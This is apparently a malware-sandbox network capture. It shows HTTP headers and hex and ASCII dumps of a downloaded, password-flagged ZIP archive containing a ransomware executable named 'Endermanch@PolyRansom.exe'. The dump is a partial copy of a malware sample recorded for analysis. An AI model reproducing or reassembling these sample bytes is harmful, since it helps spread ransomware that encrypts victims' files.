                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:25 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6951-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455885.201844,VS0,VE118
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: ddf3fb6d489e1e8d30a93cc5465a4e6098c5b12d
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:25 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:25 UTC2234INData Raw: 50 4b 03 04 14 00 01 00 08 00 d7 0a 79 45 34 43 fb 93 c7 09 02 00 00 70 03 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 6f 6c 79 52 61 6e 73 6f 6d 2e 65 78 65 58 ef 05 c0 b6 8a bd fa 25 51 13 b9 f0 ae cd 11 df 91 dc 43 09 90 1b b5 9d 5d 56 12 5c 94 0e ff 03 d7 23 cf 58 8f c9 fc 7a ca d0 4b c3 a3 27 ee 75 4b 94 c3 a8 37 cb c7 96 47 64 25 16 5f 75 8b 47 35 1c ec 30 cf b0 1c 29 8d 4e 7a b2 68 9f 1a b9 f2 b5 cf 25 fc 5f cb e5 54 45 19 d1 c3 7f 29 0e 9a 48 e3 c3 db bf d1 58 a6 62 90 28 e7 25 5d 5d 44 e2 fd ca 22 88 a8 30 1b 7c 35 9b ac 29 b6 47 ea 2d 68 27 71 fa 3a dc b6 a1 8c 7d 62 f8 31 e2 cb 11 3a ce b9 5e a4 0e 64 ef 92 64 9d 74 fb c5 0a 39 83 f1 e4 aa 69 59 2b df 89 eb ae a0 07 94 80 66 94 95 09 21 bb 66 6e af 73 6b ff d8 aa 55 47 28 e9 d7 86 82 af
                                                                                                                                                Data Ascii: PKyE4CpEndermanch@PolyRansom.exeX%QC]V\#XzK'uK7Gd%_uG50)Nzh%_TE)HXb(%]]D"0|5)G-h'q:}b1:^ddt9iY+f!fnskUG(
                                                                                                                                                2022-09-29 12:51:25 UTC2235INData Raw: 17 33 ff c8 39 47 fa ee c0 ad ea dc 38 f8 ca 65 24 cf 8a 2b c5 cb f0 93 b0 18 83 98 05 b8 3f 55 28 df a7 92 90 48 63 1c a0 ad 30 71 3e d5 16 f9 a6 5c 20 0c 28 f2 78 b4 5b f5 38 cd 49 b0 e4 1e 4a 2e e8 98 c3 c7 72 d8 4b ad c6 fc 30 05 aa 65 00 27 a1 8e 77 33 05 dc 07 4f 71 ba 48 a8 1e ed ea 11 5e c8 4c f1 45 3b 4b 58 2c e8 d3 77 12 7c 39 e9 f9 04 7c 9b 2b 04 3e 6e 86 73 4e 63 64 c9 ed 8a 88 e7 f5 61 6d 26 7b 79 07 2f d8 35 b3 d0 42 09 2d 06 d0 21 18 b6 28 e9 65 3f e2 fd f8 09 fd 9f d7 ed 2e 94 a5 7d 9c c7 00 88 56 76 ca f7 10 42 f2 5b d5 9a e1 40 59 83 65 c4 07 4a 6d 0d a2 fc 1a b9 5c 9a 94 c3 1d 80 82 d3 d2 58 e9 e6 c1 fb b2 2b 87 05 ee 54 c5 15 da f8 68 7d c5 de 0f 44 33 a4 27 dd 85 43 4c 6c 43 a5 c6 b4 7a d1 47 68 e3 12 99 3d 46 1b 14 a2 4a de 25 5e 89
                                                                                                                                                Data Ascii: 39G8e$+?U(Hc0q>\ (x[8IJ.rK0e'w3OqH^LE;KX,w|9|+>nsNcdam&{y/5B-!(e?.}VvB[@YeJm\X+Th}D3'CLlCzGh=FJ%^
                                                                                                                                                2022-09-29 12:51:25 UTC2237INData Raw: bd f7 c9 f4 a3 b7 91 79 2e c3 11 2b 6e 64 1a 4b ea 6c 91 b8 c3 16 33 e8 77 c9 26 f6 aa 9c e4 5c 8b b0 ad a6 07 e1 9c 46 01 f4 f4 3d 7c 84 81 84 bd e4 25 ee b9 e6 b7 ea 46 c7 48 df 0c f2 a8 8d 48 2b d4 a6 b6 be 2f 8f b7 54 ed 32 64 24 bb b6 6f 0c f9 64 5f f4 f0 d0 f5 8b cb b1 41 2e ba 3b bb e6 08 72 24 c7 bd 52 82 ec e6 db 5d fe af bd 52 6c c0 40 40 c6 8e ec 88 a6 30 2b 7d bf 4e 78 6a bf a7 5d 12 c7 80 00 95 c3 cb 75 0b e0 a4 cd 03 03 23 33 bc 68 bd db db 96 93 55 6f 65 85 39 c8 bb 46 7e 20 07 97 3f b4 9d 62 24 65 19 1d 2a 0f 6b 2d 5e b6 16 ab d2 54 d4 ad 39 00 30 6b 38 cb 5c 9e 9c 59 33 7a 6c f4 cf 56 f5 15 19 36 ee 69 3e 4b 27 5b 83 32 3f 85 2d d4 45 97 9b eb 70 66 93 70 86 9c a1 75 c3 1a 30 71 e0 1c 83 3a d5 fe b2 95 a8 8a bf 92 85 94 b3 24 ae f3 b3 c2
                                                                                                                                                Data Ascii: y.+ndKl3w&\F=|%FHH+/T2d$od_A.;r$R]Rl@@0+}Nxj]u#3hUoe9F~ ?b$e*k-^T90k8\Y3zlV6i>K'[2?-Epfpu0q:$
                                                                                                                                                2022-09-29 12:51:25 UTC2238INData Raw: af 2f 92 fa 0b 8a 59 a4 6f 60 d1 13 9c b4 d5 e0 b7 69 9e ff 76 40 97 6e 76 11 06 68 4d 66 6e ed 50 b6 b9 dd fe 17 5d d2 d4 26 1f f4 fa 64 c5 02 49 f1 47 27 02 90 d9 96 37 64 b4 69 c6 0a 3e f4 a9 b4 01 b6 9e 1e c4 1b 50 71 70 f1 b7 5b b4 a7 27 f7 22 c2 3b 90 3f c4 03 c9 07 14 8a c2 6c 28 20 63 99 e2 43 fd f0 3d a9 84 d7 e7 46 1b 81 0d d8 28 7b 24 6b ad dc 66 2b 5d 77 0b 9c f2 d5 1e da 6a ab 0a 12 03 29 8f 21 78 36 9e 5a 15 31 b4 e1 d8 08 4a c0 92 8e 09 62 2f 28 9f 31 29 a3 bf a7 f0 f7 e6 3a c1 f8 09 1e c7 02 5a 03 89 8a 7a 54 b1 96 85 54 7d 57 09 4d 85 2d 00 0e fc 5f db 3a 2d 97 cc c0 60 9e f5 bd 40 d3 53 71 14 eb 51 fb 6f 64 b4 cb c1 6a 71 69 71 95 40 4f 59 25 9e 5d 35 7a ea 15 ca be 91 09 c2 d3 0e cc 89 aa 66 6d cd 7b 0a 19 8d 8f 92 b4 7f 1e 0c 6e fd ef
                                                                                                                                                Data Ascii: /Yo`iv@nvhMfnP]&dIG'7di>Pqp['";?l( cC=F({$kf+]wj)!x6Z1Jb/(1):ZzTT}WM-_:-`@SqQodjqiq@OY%]5zfm{n
                                                                                                                                                2022-09-29 12:51:25 UTC2239INData Raw: 36 ad 6f 8f d3 b1 7c 89 65 8d da b4 42 c8 e6 93 75 55 84 96 48 65 bd b9 5c 46 96 d7 72 6e 94 7b 79 95 ba 64 46 9e 00 5e f1 93 09 11 c2 a4 f5 5d 96 4e be 29 2b 8b 67 48 3f 2d c8 04 7f a6 65 d5 13 e2 80 cd 4f 6d ae 8c cd 71 bb b4 33 97 ce 27 1d 51 c9 02 6c 7e a0 3f c3 cb a8 f8 29 b0 e0 72 d6 de df 20 1f 0a 38 2e ea 62 4e 3c f1 ec 7c b5 d0 33 c6 01 9f 65 1d 6a 8c ed c3 23 1d 29 68 01 e4 d9 8e a7 a6 0d 80 0c 31 d7 28 92 f2 f1 61 d4 dc 79 20 ac 2c 3a 4a ee 15 c0 be 79 32 78 09 ad 2e 36 9e bf a6 1a bb 27 b3 8b 97 6c e3 61 c0 c5 66 a7 61 9b 22 87 53 ea 7e 4e c6 a4 b1 69 b2 9c 21 c4 b3 7d 8e ea 52 86 5b f6 36 df 94 5d 2f 82 f6 60 e9 c6 1c 71 d5 79 53 a0 9b 3f 74 33 3a 77 6e b8 58 ef cb 45 39 02 b2 6d cd a0 a6 b5 39 8c 7f e5 d7 ea 0e f4 c0 dd 87 30 ea f9 2b a4 92
                                                                                                                                                Data Ascii: 6o|eBuUHe\Frn{ydF^]N)+gH?-eOmq3'Ql~?)r 8.bN<|3ej#)h1(ay ,:Jy2x.6'lafa"S~Ni!}R[6]/`qyS?t3:wnXE9m90+
                                                                                                                                                2022-09-29 12:51:25 UTC2241INData Raw: 88 8d 3b 50 8e 4f a5 ce 06 b4 a0 28 e3 90 11 fd a0 db 69 5c df 92 a2 d7 58 4f f8 f4 55 60 6f b6 4d a6 49 1b f1 d9 cf 7f b8 3f a2 74 b6 8a 02 33 3d d3 cb 46 64 57 02 f3 f4 78 04 d0 60 30 f3 c6 93 02 05 c9 74 c0 0d b2 2b f1 42 2c c0 da 6d a6 67 ff a1 f5 e7 fd da 55 1f 0e e0 15 26 a7 55 43 f4 22 31 e5 9e 50 13 a4 f5 f9 1f 36 21 5d 0c 45 0e 70 0a c3 f6 3e 14 b0 65 b3 b7 a8 f4 d1 a6 be 9a 1a 40 c6 3d 06 81 60 f5 7b 32 81 60 e7 04 d1 3f 0e 50 80 f7 5d 82 0f 21 3d e1 3b cc a5 40 2f 86 4d 41 09 7f 71 f0 c3 1c 98 29 95 53 49 ae fb 9c e3 91 0d fe 5d d6 bd 67 49 f2 39 4b e5 29 bb d9 02 63 3e ed bf ba 32 85 96 68 4d 19 8d 4e a7 37 13 b7 f4 74 cc 77 10 a1 5f f3 69 9a bc e7 84 d8 e5 90 91 c7 29 64 c4 82 13 d5 2b 4f b9 a9 a7 39 6d 4d ba 61 8c 82 8f c3 01 ae 61 b2 a8 b4
                                                                                                                                                Data Ascii: ;PO(i\XOU`oMI?t3=FdWx`0t+B,mgU&UC"1P6!]Ep>e@=`{2`?P]!=;@/MAq)SI]gI9K)c>2hMN7tw_i)d+O9mMaa
                                                                                                                                                2022-09-29 12:51:25 UTC2242INData Raw: 58 4e 59 50 68 be fa e0 fc dc c5 7d fb 22 db 08 a8 cd 83 fe 14 3b 85 62 f3 9f 8b 2c f8 08 a7 69 e0 39 44 b7 e7 e1 e7 2b af c9 d0 09 eb 96 b8 d1 b0 0e 30 55 e5 35 e8 d1 96 5d 18 8c c4 8b 6b a0 63 97 c0 21 41 19 f2 b7 57 f5 0f d6 44 64 7e f7 5f ba 82 4d ca a9 08 d3 b6 31 ee ad df fe 76 a7 ab 04 f3 36 e5 0d 89 bf 8c a0 00 8c ff 7e 27 c2 13 a6 0f 87 94 5f 75 99 c3 86 2f 12 26 0c b5 a8 ff 6e c5 0f eb 20 be 28 83 38 60 8d 18 bc 8d ab 56 37 76 fe 16 1d 24 fc c3 ff 22 76 53 21 29 7d 6f c9 69 a6 8b e9 35 ef 51 95 bf c2 df da 7f dd 26 f0 4e 7d 8b da 21 98 d2 6a 57 75 87 37 0e 5e b7 f9 32 3c f2 17 fc de 22 65 3f 4c 6d 84 a1 dc 7c 7b 84 05 82 6a 54 79 a8 5f fd a3 e8 b9 67 9f 37 b1 7a a5 4e b0 01 b1 e3 d2 49 4e b6 a1 32 bf 87 e2 77 8b 26 e6 fd f8 ea 88 40 f2 67 31 a7
                                                                                                                                                Data Ascii: XNYPh}";b,i9D+0U5]kc!AWDd~_M1v6~'_u/&n (8`V7v$"vS!)}oi5Q&N}!jWu7^2<"e?Lm|{jTy_g7zNIN2w&@g1
                                                                                                                                                2022-09-29 12:51:25 UTC2243INData Raw: 17 4f 9f 16 79 0e e3 11 02 3c 20 eb 0b ad ec b9 43 6d b0 7d 80 8c 8a c3 5d 96 d3 d9 40 6f 7e 0f 47 88 d7 e7 85 4c 3e 7d 24 92 01 2e 4c 3a 5f 68 df 84 25 c5 93 c2 76 1a 38 2d 7a 2b 46 a7 49 ee 22 c1 88 ac c9 a5 ae 6d e3 30 7d db 13 54 04 b4 f6 7b c6 5c 6a 38 c4 34 20 1e 5d 91 82 80 eb 5e be 6b 6c f4 90 14 d1 3d 15 12 3f 6f 2e 80 f2 7c 36 55 6f 95 10 13 59 9f 60 42 cb 7f fb d0 17 3b aa 8a 0b 33 e2 a0 ad a8 a0 2c aa 1b 45 d0 9e 41 e1 59 7d 76 bf 97 a1 58 d6 e9 8e fb 99 11 91 c4 aa ee 4e 8f 4f 83 7d ef ca e6 6f b0 3f 73 b2 d4 d9 30 7d cf 0e f6 0c 8e d4 63 8f ba f2 f8 2e b0 53 b0 2e 15 1d aa 4d 9a 3c bc 15 a3 72 99 63 b7 42 40 1e ef 55 95 e9 36 00 42 14 8e 79 42 32 c2 65 48 ea e0 48 4d a9 fd bc 1a 7e cb 28 45 00 a9 db f3 d2 7c 22 e9 42 87 f4 a8 84 1f 64 9a 14
                                                                                                                                                Data Ascii: Oy< Cm}]@o~GL>}$.L:_h%v8-z+FI"m0}T{\j84 ]^kl=?o.|6UoY`B;3,EAY}vXNO}o?s0}c.S.M<rcB@U6ByB2eHHM~(E|"Bd
                                                                                                                                                2022-09-29 12:51:25 UTC2245INData Raw: bd e4 3e e9 4f 63 22 01 2d c1 3b 76 92 1a 58 50 43 55 35 a7 7a 03 5e a6 11 56 90 cf 03 15 80 36 77 9a e7 1e 12 ab dc 70 2b 8b cc cc 83 06 4e 04 0f fd fa 69 73 45 20 85 9c 52 e9 83 08 bb 32 42 f8 9b 00 78 e0 8e 44 2f 1a aa 2b 89 a6 ea 52 cb fa 2e 77 25 f8 f6 94 78 9c 77 fb 3a 31 43 ce 3c ce fc 44 a6 79 fd 48 28 ab e1 dd 83 9d e4 1a 09 d1 e1 3f fd 66 75 7c 7b e7 00 a8 41 46 27 89 ce ba e3 69 a1 cb 3d 5e 40 8f b0 cf 22 f0 05 a9 79 47 56 1c 69 5d 89 3c 64 95 2d 82 b4 7d 0e 85 c2 6d ba ea 70 82 16 d2 a3 89 da a8 8f 40 1d 9c a9 0c 68 77 c5 3e 73 a1 f2 b4 5e 9b 17 a2 1c 3e 7f 4a e6 5c d1 98 14 e8 ce 6d 47 cf 8c 00 f8 bf 18 16 39 65 1c bd 32 92 a2 9e ad 41 48 2f 4a bb 9d 9c 52 fa 29 a6 54 34 b2 8e 1a fd d6 4b 10 d9 0b 2d 32 63 cc b3 75 31 2b e5 05 35 c8 97 aa 62
                                                                                                                                                Data Ascii: >Oc"-;vXPCU5z^V6wp+NisE R2BxD/+R.w%xw:1C<DyH(?fu|{AF'i=^@"yGVi]<d-}mp@hw>s^>J\mG9e2AH/JR)T4K-2cu1+5b
                                                                                                                                                2022-09-29 12:51:25 UTC2246INData Raw: 9f ef 66 f3 94 af 4c b3 09 2d ab 0e 4e af 97 cd 23 bd 24 8a a5 9d b2 af 58 33 93 68 cb 5a ec 70 3f eb aa 56 e7 0a 29 b0 cc 2f 25 e4 e4 e7 3f de ec bb ef 17 56 22 a8 75 da 1f b2 81 d8 36 73 d5 cd 75 2c 9a dd a4 f4 cf 13 c7 34 a9 f0 12 db dd 27 fd 16 54 be 21 62 2c ac 9b a5 2e 32 d7 95 73 14 00 c0 89 f1 83 5c 1c c8 6a 6f 21 15 25 e3 b4 ea 01 97 b8 38 e2 d8 65 69 cf 54 dc 30 a2 61 40 30 18 0b 95 09 a9 97 73 47 ac a9 d3 44 fa 3d b9 51 b1 6e 24 60 3b aa c3 0a fb 9a ea fd 46 24 2b ba f5 b1 fa 71 19 22 a4 33 85 c1 bd df 8e b2 b2 55 0e 17 c8 15 1d b2 f7 a4 d1 cd ad de a1 30 a1 ae 69 f1 d2 d4 8a ef 39 e2 d2 42 91 7e 5d d3 b9 5c 95 2a c4 18 88 2c be 50 09 61 6f 9b 7e fb f1 0f 81 d6 16 ac 29 b8 17 b1 b9 a8 e5 84 50 e8 65 d1 e9 0c 6e 78 c7 61 43 fd da 20 1d 99 bd be
                                                                                                                                                Data Ascii: fL-N#$X3hZp?V)/%?V"u6su,4'T!b,.2s\jo!%8eiT0a@0sGD=Qn$`;F$+q"3U0i9B~]\*,Pao~)PenxaC
                                                                                                                                                2022-09-29 12:51:25 UTC2248INData Raw: aa 35 fc ed f9 c6 6c 45 53 3e 65 c2 04 79 94 18 80 5b 5c 47 94 28 b4 16 8b 92 ff f0 e4 e3 08 f2 c5 b2 05 1b 63 f1 11 da a4 07 cd 9c 5c 72 16 40 b0 88 7b 70 a8 cd fc 61 43 63 80 fd 6d 5e ab 74 50 99 9a 89 88 cb 07 73 e2 62 40 9f c6 7f 68 00 24 7e ca b7 53 8b e8 6a a6 3c e3 07 56 a3 96 a6 37 2a 66 14 a8 09 cf 0e 03 59 df 25 da 2c 2c 1a 63 fe ac 67 a3 8c e6 3b 9d 0c 8f 1d 6c 52 4a d2 6d 04 fb 63 8d 31 1a d4 6a 2f e6 e8 42 bd 26 b6 86 79 51 c3 16 07 d0 59 43 b4 0d 06 da bb a8 13 14 d3 61 06 79 2d 6d 32 12 9f 0d 0c 36 16 92 76 5f 8b 17 fa a1 76 77 40 61 e7 26 da 36 67 c0 c1 e9 8a f6 c2 43 b3 39 89 56 a0 9d 2f 69 f8 3d e6 2f 51 c4 5e a2 c7 e6 ad 6d b2 50 8b e1 0b 2e bd 49 84 b2 f0 2b ce 3d 65 13 12 d0 de 76 d3 4a d9 34 c7 5d 13 54 62 ee cb da 03 23 8c b0 2c 20
                                                                                                                                                Data Ascii: 5lES>ey[\G(c\r@{paCcm^tPsb@h$~Sj<V7*fY%,,cg;lRJmc1j/B&yQYCay-m26v_vw@a&6gC9V/i=/Q^mP.I+=evJ4]Tb#,
                                                                                                                                                2022-09-29 12:51:25 UTC2249INData Raw: 30 d8 57 76 4c f0 0a de 96 b8 b8 07 a3 40 fb 59 1f b7 3e 70 b5 a1 b4 9c ad bc a9 23 e6 4e 38 22 6d b6 63 da 85 56 94 1e c1 ed 8b b4 a4 0d 63 c5 db 96 7a e2 54 93 80 0f e9 3d 27 80 c3 f9 d0 6f a8 29 36 05 a1 d5 e4 a4 5b 11 3e 7a dd 31 fa 00 75 5e 5a 44 90 a2 37 e8 ea 28 63 a5 82 fd ec 53 c4 f4 af b0 ba 7e a4 d8 43 1a 68 2c 18 9a 5f bd 70 e6 c2 82 d7 03 c4 9e 3c 70 95 89 fb 0e 21 aa 7e 26 84 2a c1 29 67 4a 24 96 1c fd 9d 71 ec f0 32 35 51 04 7a 26 c1 bd 72 07 f5 a6 f6 ce 72 b6 d6 4f fd a1 42 e3 22 f0 fd 7b ab 46 67 71 9e 14 ed ae 18 f0 3f b3 31 4f d5 7c 4f 64 f3 93 b8 e1 f5 88 2a 03 b0 23 58 7c 28 5b 7c b8 5e 4b c7 ea 6f bd c2 52 ec 9e e5 e1 7e 0b 9b 6f 47 0d 4f 93 82 57 70 c8 1e c4 c1 ad f1 c6 02 3a ba 0a 1b b0 06 fb f7 66 c5 7a 02 0c bb 0d f7 5e c9 9b 9e
                                                                                                                                                Data Ascii: 0WvL@Y>p#N8"mcVczT='o)6[>z1u^ZD7(cS~Ch,_p<p!~&*)gJ$q25Qz&rrOB"{Fgq?1O|Od*#X|([|^KoR~oGOWp:fz^
                                                                                                                                                2022-09-29 12:51:25 UTC2249INData Raw: ce 70 1f b5 d7 1d a3 ba 82 ab 97 46 aa 94 fa 93 f8 cb 88 c8 d9 7e 2c 2c f8 02 23 c4 04 6a 85 ef 1f 1d 95 a2 ff 49 3d 3c f8 2d f0 a9 be 07 6d 9d 83 12 5a 16 65 cd fc 48 45 b6 9c 10 52 55 de 4f 31 ee e6 84 b4 b0 cd 0c ea 61 a6 9e a6 5c 87 bf 97 52 ce aa 81 ea fc 35 8a 7b 94 5b 49 9f 2e 44 ac 35 fa 69 f4 56 79 8d 46 ed 11 8d 8d 30 bb a9 2b 42 98 f0 cf 3b 50 3a d9 0d de cd f3 45 20 00 ea bf c2 ac 13 74 e4 e5 a2 64 59 da f5 ac 2c 54 9a 25 61 8c ab b4 6f a6 03 cc 44 62 ac a7 52 a0 32 d7 fe 54 de 8a 40 70 ce 82 5a 3a 66 72 e1 e0 af 25 f1 1e a8 a7 3d 53 8f ca 0f 8d f9 0a 00 03 0a 82 33 47 1c f3 0c b8 f6 2c 5d 87 87 2c 0b 9b 4a b7 2c f7 db 19 e4 fc 49 b6 8c 6e e5 d9 97 73 b9 c2 40 ef 59 94 69 72 d5 c0 2d f1 f6 4e 95 a9 82 68 55 f8 b4 d9 f7 bf 2b d4 5a 8f 20 9f b3
                                                                                                                                                Data Ascii: pF~,,#jI=<-mZeHERUO1a\R5{[I.D5iVyF0+B;P:E tdY,T%aoDbR2T@pZ:fr%=S3G,],J,Ins@Yir-NhU+Z
                                                                                                                                                2022-09-29 12:51:25 UTC2265INData Raw: 56 5f 9e cf 30 00 ec b8 bd 48 11 f1 69 de 65 46 a4 63 c1 c0 f7 3e 36 cd 0d c2 72 82 9e b1 a6 24 b6 d4 04 58 28 d1 b3 3d 44 16 a0 10 81 8b 0a 0c 94 0b ea 0a 41 a3 72 4b d5 d3 db b4 d9 e4 4f 25 c8 08 15 03 5d 1c 47 18 93 a1 08 d2 f7 14 19 e9 0c cf 8f fe df 0d 26 80 f7 e2 68 99 2c 54 75 bd b1 73 5e 89 aa 4a 35 70 cb 12 dc a2 38 97 2d 44 a5 0a 87 ac 48 ad 5c 41 2b be 96 70 63 cd 28 c5 38 78 4a ab 8e b3 b5 4f 19 c3 3f 46 01 d3 50 8a 23 20 e6 fe e3 0b b0 2e d1 fd 65 de a3 5b 6f 3a bb 03 88 97 30 8e 70 f5 46 f2 4d ba 0b cd 4b b4 13 68 0a 87 ae 7e 4a c7 cd 0b 1a 7a 3c a0 07 e6 e6 60 47 38 ba 4c c5 1f d3 6c 20 6f 47 ba b9 8b c5 ac f6 1c e8 7a 50 bc 52 f0 48 a5 81 27 fa 02 84 99 ab b4 f3 14 d8 3c d6 95 72 8f 46 dd b3 fa 43 41 86 ef 34 06 67 0f ae 83 4d 18 db 12 af
                                                                                                                                                Data Ascii: V_0HieFc>6r$X(=DArKO%]G&h,Tus^J5p8-DH\A+pc(8xJO?FP# .e[o:0pFMKh~Jz<`G8Ll oGzPRH'<rFCA4gM
                                                                                                                                                2022-09-29 12:51:25 UTC2281INData Raw: e8 e4 65 a8 fd 43 bb 6e ca 28 43 c1 da 16 5b 48 22 a8 9f 4d 14 13 dd c0 97 30 20 66 e2 fb 8b f0 33 3b 1b 63 8d 35 4d 0e 20 f5 fb 87 5c 09 4c b9 0a f3 28 a8 b1 97 53 8d 82 86 79 24 64 ad e0 11 e9 cc 71 d5 90 b0 86 4b ab dd fa 15 29 53 4b e3 91 6c 75 7d e6 fc 81 f1 20 ec c3 1e 63 b7 e0 e4 16 82 20 0a 57 ab c2 24 cb f8 ba 5f 61 fc 60 6c 10 d2 22 ea 83 d6 fa 8a cb 77 83 9e 54 4b 16 d3 bd 1f 90 fd 09 e9 8f 96 b3 90 dd e9 e4 1b ce ae 07 53 76 a7 f7 f6 a7 c2 fc e5 92 e8 dd 1e a5 53 94 84 32 c3 fd 8c 09 8e 43 ea a6 e3 70 a6 e5 c6 98 1f e8 bf 9e 57 95 af 35 67 10 e5 bd 48 ec bc 4f 01 1a 2f ef 1f f9 6e 5a af 45 56 76 42 3a 27 76 85 1f 91 34 d3 9b 2a f6 67 4a 7c dd d4 4d a9 33 79 bd a4 f2 9a 6c 30 80 fa ed 68 0a 41 52 d4 0a 7c 61 f3 c3 2a 95 97 f4 ac 9f 2f 94 1a c2
                                                                                                                                                Data Ascii: eCn(C[H"M0 f3;c5M \L(Sy$dqK)SKlu} c W$_a`l"wTKSvS2CpW5gHO/nZEVvB:'v4*gJ|M3yl0hAR|a*/
                                                                                                                                                2022-09-29 12:51:25 UTC2297INData Raw: 60 16 4a fd ee f3 ec 3d e0 14 8f 2b c8 0c 1c 84 cf f4 b7 99 1c 3b 73 08 d2 00 98 d3 bb 89 7a 37 dc d2 46 57 a2 ca 2a b5 6e 15 12 1e d2 a3 18 12 e5 cf 35 26 ea b0 b1 0c ef e2 b7 20 0d 5d 59 c9 86 46 54 8f b8 a3 21 47 83 a5 9f 6c db 5b fc 9d 7f 80 07 e4 74 ef 68 4f 43 2c f6 b5 f1 55 bd fb 62 72 0d df 14 dd e1 40 55 90 fe 9f 28 ff c4 36 c9 e1 19 05 aa 0a ad 45 3c 90 f2 29 04 53 15 e2 7e 94 0d 13 cf 1b a5 fb 4b c4 52 3c 19 ec e5 89 0d f9 18 f4 29 2d 86 fa d3 d6 ad 02 87 0c 21 18 89 ef 77 2e b5 2d 6f 20 96 12 75 6b 66 3e 6a a8 74 d1 d9 73 3d 4f 7d e8 11 6d a4 2c fd ec 7c 8b 7f a3 ea bf 14 df 82 a4 04 29 41 fa fa 7c f8 f1 9c fc 0d e9 26 c7 0c f2 6a 1d 6e d7 2a 8c 10 f7 fc 0c 9e 65 f1 16 a7 9a 8d df 32 29 03 2d bd 60 42 9a f1 dd 60 b7 cf 83 f5 cc f7 df 24 a6 e2
                                                                                                                                                Data Ascii: `J=+;sz7FW*n5& ]YFT!Gl[thOC,Ubr@U(6E<)S~KR<)-!w.-o ukf>jts=O}m,|)A|&jn*e2)-`B`$
                                                                                                                                                2022-09-29 12:51:25 UTC2313INData Raw: 74 c2 fc e1 42 fd c9 85 48 c3 70 8b 97 f7 df 97 a0 e4 b0 60 73 79 20 d3 fd 37 3c f1 00 4e a3 a0 a0 c1 dc a4 44 43 9a 19 74 fe 9d 23 07 6e 22 63 f0 2b 59 1d 99 9b 0a 3a c2 94 53 41 23 dd dd 06 81 6a fd 6b de ff c2 10 d9 27 c1 d8 55 50 e8 ad 53 90 a7 68 fd bf cd 3a 49 81 06 20 56 57 27 cc 19 44 62 08 a7 46 99 c1 35 56 16 96 b0 9f 1b db 8c 19 20 4e 07 66 17 4e bc 89 58 0c 1f 17 47 fd f1 f9 0e 0d d3 03 25 c1 38 99 89 5a 28 df 89 d0 04 d5 ea 58 d9 1e 55 ff 80 59 0f d8 a1 a4 99 6c 1a 6f 5b 40 31 3e 0f ad d2 d0 3c 82 b6 21 bf 1e 0b c5 a8 a4 be d3 15 7d c7 98 cf e9 80 5e 87 67 bc 16 3e 2f 62 80 f6 9e 41 3b 93 5d db 58 58 ea 7b c1 cd 76 1e 06 f7 32 4a 02 ee e0 29 1c 90 69 31 99 72 df c8 f9 9e 69 86 0a 75 0e 65 b7 d5 d0 b7 a9 1b de 05 be 20 49 15 27 e0 d0 1d a2 d3
                                                                                                                                                Data Ascii: tBHp`sy 7<NDCt#n"c+Y:SA#jk'UPSh:I VW'DbF5V NfNXG%8Z(XUYlo[@1><!}^g>/bA;]XX{v2J)i1riue I'
                                                                                                                                                2022-09-29 12:51:25 UTC2329INData Raw: fb 76 98 3d 60 51 e8 b7 63 3e a2 c6 21 e7 08 88 b4 84 54 30 6d 83 f5 3f a3 d1 31 43 a7 53 b0 f1 23 c6 86 6d b9 29 ac 55 3a d4 34 2d 56 63 de 79 ab ee 44 29 83 19 5d a4 13 c9 e4 b9 f8 5c d8 da db c2 84 b6 f7 b5 fc b1 88 b2 dd 28 fb 1d ea 6c 85 22 be d2 f1 c1 63 be b0 06 e1 a7 49 a1 b1 b9 03 c2 09 6a 02 fa db 51 1e 46 4d 2e 8a b1 29 2b 82 f7 89 de 17 2b 91 3e 7e c4 e9 de 92 3e a8 25 d4 6b 75 b9 3a 94 04 47 c1 ed 1b 1c 32 f0 6b 61 88 2b de e6 ac 9a 5a fc 8c a0 17 09 a9 dd cf b0 40 03 5a ba 0c cf 7f 62 4e 01 ed 60 41 b2 c1 e4 c7 d1 17 8a 79 cd ce 0f f7 1f 3b 40 27 e8 e4 c6 4f 5d ee 67 6f bb 89 22 38 0a ce b2 4d cc 23 b8 03 65 3b 76 73 00 98 b2 7e d1 3b ec 99 a5 a8 cb cd 0d c9 79 05 2c 72 72 23 03 ce 81 cf e3 18 81 5c 22 ce 89 4b 75 08 12 d9 ea bb 50 84 a2 03
                                                                                                                                                Data Ascii: v=`Qc>!T0m?1CS#m)U:4-VcyD)]\(l"cIjQFM.)++>~>%ku:G2ka+Z@ZbN`Ay;@'O]go"8M#e;vs~;y,rr#\"KuP
                                                                                                                                                2022-09-29 12:51:25 UTC2345INData Raw: cc 73 56 cb ab 35 3a 4e 13 d5 93 0f c8 7a 4a d8 8e 7f 77 4f 77 7b c5 67 15 66 b9 a2 1c ca cd e7 b4 ff 25 a1 35 69 73 13 2f 45 a5 6e e8 a3 48 fe 88 19 61 ca d4 dd dc 62 f8 80 a4 80 80 d5 75 7e 8c f1 88 75 e9 ec 07 0e 15 8c 34 dc ef b7 a2 9c 83 60 38 ee aa cb 96 8c 77 77 d5 a8 4e 8a 1e 4c f3 49 4f de 0e d7 2e c6 07 99 ef 77 f6 20 8c ba 8e b5 28 80 ff 03 53 de b3 8a 47 98 bf 8c df 01 52 34 ec 07 23 66 5e da 81 e1 ea 13 44 ca d9 45 2c 74 ce 4c 61 2d 79 51 67 d7 45 e7 ce f0 4e 70 81 fb af 1d f5 f9 45 4e e3 88 bc 31 08 db ce a6 ea 76 f5 f3 36 e2 af 83 92 31 ff 49 db 30 db 0e 21 38 b8 77 8f 0b 9d 86 ab 87 b6 9c ff f2 bc f3 22 95 32 a4 8e 09 55 79 be bc f6 a4 fb 3b 67 a8 9e 85 76 0e 6d 03 8a 5c ff c0 9e e4 7a 0c 23 22 42 f6 a2 95 e0 dd 4a 84 46 ef 31 eb e0 85 ea
                                                                                                                                                Data Ascii: sV5:NzJwOw{gf%5is/EnHabu~u4`8wwNLIO.w (SGR4#f^DE,tLa-yQgENpEN1v61I0!8w"2Uy;gvm\z#"BJF1
